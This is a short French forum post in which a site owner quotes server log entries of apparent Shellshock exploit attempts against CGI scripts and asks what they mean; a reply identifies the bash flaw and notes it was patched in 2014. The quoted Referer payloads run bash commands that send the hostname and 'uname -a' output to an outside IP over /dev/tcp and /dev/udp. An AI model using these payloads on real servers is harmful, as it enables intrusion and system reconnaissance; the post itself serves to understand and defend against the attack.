Tentative ... peut etre ..piratage?

un coup client 82.165.157.217
puis client 62.193.193.19
puis 62.193.193.198
… bon voila ce qu’il tente de faire…

/usr/lib/cgi-bin/test-cgi, referer: () { :;}; /bin/bash -c “echo MONDOMAINE.ORG/cgi-bin/test-cgi > /dev/tcp/62.193.192.103/23; /bin/uname -a > /dev/tcp/62.193.192.103/23; echo MONDOMAINE.ORG/cgi-bin/test-cgi > /dev/udp/62.193.192.103/80”

MONREPERTOIRE/cgi-sys, referer: () { :;}; /bin/bash -c “echo MONDOMAINE.ORG/cgi-sys/php4 > /dev/tcp/62.193.192.103/23; /bin/uname -a > /dev/tcp/62.193.192.103/23; echo MONDOMAINE.ORG/cgi-sys/php4 > /dev/udp/62.193.192.103/80”

je comprends un peu mais je ne suis pas un pro… une petite explication s’impose… svp
merci pour vos lumieres…

A première vue il s’agit d’une tentative d’exploitation de la faille “shellshock” de bash, via un script CGI du serveur web. Faille corrigée depuis septembre 2014 si le système est à jour.